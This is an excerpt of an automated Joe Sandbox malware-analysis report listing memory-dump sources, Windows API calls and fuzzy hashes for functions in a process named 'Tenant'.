                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: 9b190d9a0a020fb9ab5dd1bb84df7dfbbc9bb94d6aa7cd589487aa5302cf5a66
                                                                                        • Instruction ID: 170de9195585b9dec81fbbbde0b45bc6790ca87cfab4e1c5d75f060583c004ba
                                                                                        • Opcode Fuzzy Hash: 9b190d9a0a020fb9ab5dd1bb84df7dfbbc9bb94d6aa7cd589487aa5302cf5a66
                                                                                        • Instruction Fuzzy Hash: 83410674508341CFDB14DF14C584B1ABBE1BF45308F1989ACE88A8B3A2C335E885CF52
                                                                                        APIs
                                                                                          • Part of subcall function 00AB4B29: FreeLibrary.KERNEL32(00000000,?), ref: 00AB4B63
                                                                                          • Part of subcall function 00AC547B: __wfsopen.LIBCMT ref: 00AC5486
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00AB27AF,?,00000001), ref: 00AB49F4
                                                                                          • Part of subcall function 00AB4ADE: FreeLibrary.KERNEL32(00000000), ref: 00AB4B18
                                                                                          • Part of subcall function 00AB48B0: _memmove.LIBCMT ref: 00AB48FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1396898556-0
                                                                                        • Opcode ID: a7b3bb18fdd4bde78d2999ae1abc6729ba6b8154c63e523bfa0c48c6508bd3e7
                                                                                        • Instruction ID: 3c61ad2ba89d17171ae4e23c46882877eeffa66f3d3bc29ddebd86357cfe6929
                                                                                        • Opcode Fuzzy Hash: a7b3bb18fdd4bde78d2999ae1abc6729ba6b8154c63e523bfa0c48c6508bd3e7
                                                                                        • Instruction Fuzzy Hash: 16112731650209BBCB10FB70CD12FEE77AD9F48781F10442DF581A6193EE719A10AB94
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
                                                                                        • Instruction ID: 3728121abbfeba1051542a04e818b74e076f5dbd8eba4fbafcf45db726d47895
                                                                                        • Opcode Fuzzy Hash: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
                                                                                        • Instruction Fuzzy Hash: 8A114C76204601DFC724CF28D591E56FBF9FF4A354B60882EE49ACB262E732E841CB50
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: b8326261037189eaf86b4440878238d888020b554341d48d957ba5b1a343936d
                                                                                        • Instruction ID: d73c8ac35662bc9c91e8235ff36268c522463797b2a322d71d53cbcb0df30b95
                                                                                        • Opcode Fuzzy Hash: b8326261037189eaf86b4440878238d888020b554341d48d957ba5b1a343936d
                                                                                        • Instruction Fuzzy Hash: DE21F0B4A08341DFCB14DF14C544B5ABBE5BF89304F09896CE88A57362C731E849CB96
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 0395b2a835dbff9dd1549838c9731aea477c68174e31b915e9f67382827cc5ea
                                                                                        • Instruction ID: be3d086ae078a10fbccec4e071381d70466fd08aaccbf39fd255c5ebbc59ab12
                                                                                        • Opcode Fuzzy Hash: 0395b2a835dbff9dd1549838c9731aea477c68174e31b915e9f67382827cc5ea
                                                                                        • Instruction Fuzzy Hash: A2018172200225ABCB24DF2DD991E7BB7A9EF86364714856EF90ACB245E631E901C7D0
                                                                                        APIs
                                                                                        • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00B14998
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentVariable
                                                                                        • String ID:
                                                                                        • API String ID: 1431749950-0
                                                                                        • Opcode ID: 39e10aa0264438dc846e27f389413b1a85f45133e07c8b49cfcee20650933ff5
                                                                                        • Instruction ID: 2d35b1bd2701178762b3f05e7a2d2dba7bfbce066e2db0fc6c44558c34348a7e
                                                                                        • Opcode Fuzzy Hash: 39e10aa0264438dc846e27f389413b1a85f45133e07c8b49cfcee20650933ff5
                                                                                        • Instruction Fuzzy Hash: 13F03135608108AFCB14FB65D946D9F7BFCEF49320B00405AF8049B2A2DE71BD81C754
                                                                                        APIs
                                                                                          • Part of subcall function 00AC0FE6: std::exception::exception.LIBCMT ref: 00AC101C
                                                                                          • Part of subcall function 00AC0FE6: __CxxThrowException@8.LIBCMT ref: 00AC1031
                                                                                        • _memset.LIBCMT ref: 00B07CB4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw_memsetstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 525207782-0
                                                                                        • Opcode ID: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
                                                                                        • Instruction ID: 86b9e0e4163eb0c67165a368ed061043f86997f533378188d998589f8c0f9fc3
                                                                                        • Opcode Fuzzy Hash: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
                                                                                        • Instruction Fuzzy Hash: 9C01EF75608200DFD321EF5CDA41F4ABBE5EF59310F25849EF5988B3A2DB72A8408B91
                                                                                        APIs
                                                                                          • Part of subcall function 00AC0FE6: std::exception::exception.LIBCMT ref: 00AC101C
                                                                                          • Part of subcall function 00AC0FE6: __CxxThrowException@8.LIBCMT ref: 00AC1031
                                                                                        • _memmove.LIBCMT ref: 00ADDC8B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw_memmovestd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1602317333-0
                                                                                        • Opcode ID: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
                                                                                        • Instruction ID: 58d28451ba8443fdbd482e40d285673d377ee2cb7fb94478bea801d43e70d266
                                                                                        • Opcode Fuzzy Hash: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
                                                                                        • Instruction Fuzzy Hash: 18F0F974604101DFD720DF68CA81E19BBF1BF5A300B25849CF1998B3A2E772EC51CB91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _fseek
                                                                                        • String ID:
                                                                                        • API String ID: 2937370855-0
                                                                                        • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                        • Instruction ID: de26afb6196f0155765479827f30ba5fab3bab85ccee8c4d999289b37b827e13
                                                                                        • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                        • Instruction Fuzzy Hash: FAF08CB6400208BFDF108F95DC04DEB7B7DEF89320F00419CF9045A111D272EA218BA0
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,?,?,00AB27AF,?,00000001), ref: 00AB4A63
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: 6f094e21fd91618d5109f7bea88fd90e36c0a787ab1b89be7d814e3e6d1c9293
                                                                                        • Instruction ID: 38c8869cc3cc9a2c10d0ae2574851928514fd96c4789a04c0c8fdf6dbac4f8f5
                                                                                        • Opcode Fuzzy Hash: 6f094e21fd91618d5109f7bea88fd90e36c0a787ab1b89be7d814e3e6d1c9293
                                                                                        • Instruction Fuzzy Hash: 58F01571145701CFCB349F64E49089ABBF8AF18365320892EE1D683612C731A984DB44
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 2638373210-0
                                                                                        • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                        • Instruction ID: 3ead3183b9ebd1685496ab7bdf762cc5798c484baab919467904f8f2786529b4
                                                                                        • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                        • Instruction Fuzzy Hash: EFF0F87640020DFFDF05CF94C941EAABB79FB18314F208589F9198A212D376EA61AB91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: f5bbc7690d3e444d2ed0592125d86932c9c2ea9f441ebe4a17b499a881acf91d
                                                                                        • Instruction ID: e565a6430b27cf00b938fdd53b2c2dce114712fa5f7500c76e692a5f96a08b3a
                                                                                        • Opcode Fuzzy Hash: f5bbc7690d3e444d2ed0592125d86932c9c2ea9f441ebe4a17b499a881acf91d
                                                                                        • Instruction Fuzzy Hash: C1E02B717083C65EE7309B669804F66FBE4AF81314F20842AD4D583281E7F558D49BA1
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AC09E4
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2514874351-0
                                                                                        • Opcode ID: 1283f4f30fdd87bcf0ae301c98a4a9f0f2a74f913f5cd55cf7dbb6e5d105dbb9
                                                                                        • Instruction ID: 8296c554ae6be0c9551abfc1e1355b2235b92c61f8a7203084b15afd08295ee3
                                                                                        • Opcode Fuzzy Hash: 1283f4f30fdd87bcf0ae301c98a4a9f0f2a74f913f5cd55cf7dbb6e5d105dbb9
                                                                                        • Instruction Fuzzy Hash: 21E0863290022857C721A6989C15FEE77DDEF89690F0401B7FC09D7304D9649C8186D1
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNEL32(?,00B03BFE), ref: 00B04FED
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: f7b1f5130b61101195a4d54178d457f9aeccd7e7599ad0a5d99b72b181bcc78c
                                                                                        • Instruction ID: c646369cd2f9a03df364a469e0c31d6a1c23d121237a80823bcc231831ef9c3a
                                                                                        • Opcode Fuzzy Hash: f7b1f5130b61101195a4d54178d457f9aeccd7e7599ad0a5d99b72b181bcc78c
                                                                                        • Instruction Fuzzy Hash: D9B092B4010A0257DD282E3C195809D3B819C423A97E81BC1E57C964E197398C5BA520
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wfsopen
                                                                                        • String ID:
                                                                                        • API String ID: 197181222-0
                                                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                        • Instruction ID: 70d0865bcd1878cec7b123bcfb3ff5b76d9e1c354b54727a9d932684d7219bf3
                                                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                        • Instruction Fuzzy Hash: 7BB0927684020C77CE012A92ED03F593B2E9B40669F408020FB0C1C162A673A6A09689
                                                                                        APIs
                                                                                          • Part of subcall function 00B04005: FindFirstFileW.KERNEL32(?,?), ref: 00B0407C
                                                                                          • Part of subcall function 00B04005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00B040CC
                                                                                          • Part of subcall function 00B04005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00B040DD
                                                                                          • Part of subcall function 00B04005: FindClose.KERNEL32(00000000), ref: 00B040F4
                                                                                        • GetLastError.KERNEL32 ref: 00B0C292
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                        • String ID:
                                                                                        • API String ID: 2191629493-0
                                                                                        • Opcode ID: 42ca1a4a3c4f078f14eaae932b70cd2592e8be394d249fed86af402a676a9c4c
                                                                                        • Instruction ID: a0040e297a7a7d251838c0708c5821d55daa37f1a6a14d87b79cbd567361f858
                                                                                        • Opcode Fuzzy Hash: 42ca1a4a3c4f078f14eaae932b70cd2592e8be394d249fed86af402a676a9c4c
                                                                                        • Instruction Fuzzy Hash: 13F08C322106109FCB10EF59D850B6ABBE9AF89320F058059FA099B392CB70BC01CB94
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B2D208
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B2D249
                                                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B2D28E
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B2D2B8
                                                                                        • SendMessageW.USER32 ref: 00B2D2E1
                                                                                        • _wcsncpy.LIBCMT ref: 00B2D359
                                                                                        • GetKeyState.USER32(00000011), ref: 00B2D37A
                                                                                        • GetKeyState.USER32(00000009), ref: 00B2D387
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B2D39D
                                                                                        • GetKeyState.USER32(00000010), ref: 00B2D3A7
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B2D3D0
                                                                                        • SendMessageW.USER32 ref: 00B2D3F7
                                                                                        • SendMessageW.USER32(?,00001030,?,00B2B9BA), ref: 00B2D4FD
                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B2D513
                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B2D526
                                                                                        • SetCapture.USER32(?), ref: 00B2D52F
                                                                                        • ClientToScreen.USER32(?,?), ref: 00B2D594
                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B2D5A1
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B2D5BB
                                                                                        • ReleaseCapture.USER32 ref: 00B2D5C6
                                                                                        • GetCursorPos.USER32(?), ref: 00B2D600
                                                                                        • ScreenToClient.USER32(?,?), ref: 00B2D60D
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B2D669
                                                                                        • SendMessageW.USER32 ref: 00B2D697
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B2D6D4
                                                                                        • SendMessageW.USER32 ref: 00B2D703
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B2D724
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B2D733
                                                                                        • GetCursorPos.USER32(?), ref: 00B2D753
                                                                                        • ScreenToClient.USER32(?,?), ref: 00B2D760
                                                                                        • GetParent.USER32(?), ref: 00B2D780
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B2D7E9
                                                                                        • SendMessageW.USER32 ref: 00B2D81A
                                                                                        • ClientToScreen.USER32(?,?), ref: 00B2D878
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B2D8A8
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B2D8D2
                                                                                        • SendMessageW.USER32 ref: 00B2D8F5
                                                                                        • ClientToScreen.USER32(?,?), ref: 00B2D947
                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B2D97B
                                                                                          • Part of subcall function 00AA29AB: GetWindowLongW.USER32(?,000000EB), ref: 00AA29BC
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00B2DA17
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
